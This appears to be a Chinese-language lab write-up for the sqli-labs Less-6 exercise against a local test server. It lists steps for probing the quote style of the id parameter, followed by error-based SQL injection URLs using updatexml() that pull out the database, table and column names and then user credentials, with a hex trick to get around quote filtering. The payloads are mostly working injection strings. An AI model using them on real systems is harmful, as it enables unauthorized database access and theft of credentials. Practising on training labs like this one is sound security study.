1、访问首页,/Less-6/index.php?id=1,这里的传参点是id
?探测五步
- 判断是否是数字形传参
- 判断是否有单引号闭合
- 判断是否是双引号闭合
- 判断是否单引号+括号闭合
- 判断是否是双引号+括号闭合
http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1" and 1=2-- qwe

2、存在SQL注入,但是这里不存在回显点,故意输出错误的SQL,看页面是否报错,如果报错有回显哪么就可以使用报错注入,如果报错也没有回显点哪么就只能使用盲注。

3、?通过报错注入的方式使其库名被当成错误报出来
http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1
" and updatexml(1,concat(0x7e,(select database())),1)-- qwe

?4、获取表名
http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1
" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1)),1)-- qwe

5、获取列名
http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1
" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1)),1)-- qwe
-- 如果注入点允许单引号或双引号则把表名加密成16进制即可绕过
http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1
" and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1)),1)-- qwe

??通过修改limit参数,依次爆出3个字段 id、username、password
6、获取数据
http://192.168.21.144:8080/sqlilabs/Less-6/index.php?id=1
" and updatexml(1,concat(0x7e,(select concat(username,0x7e,password) from users limit 4,1)),1)-- qwe

|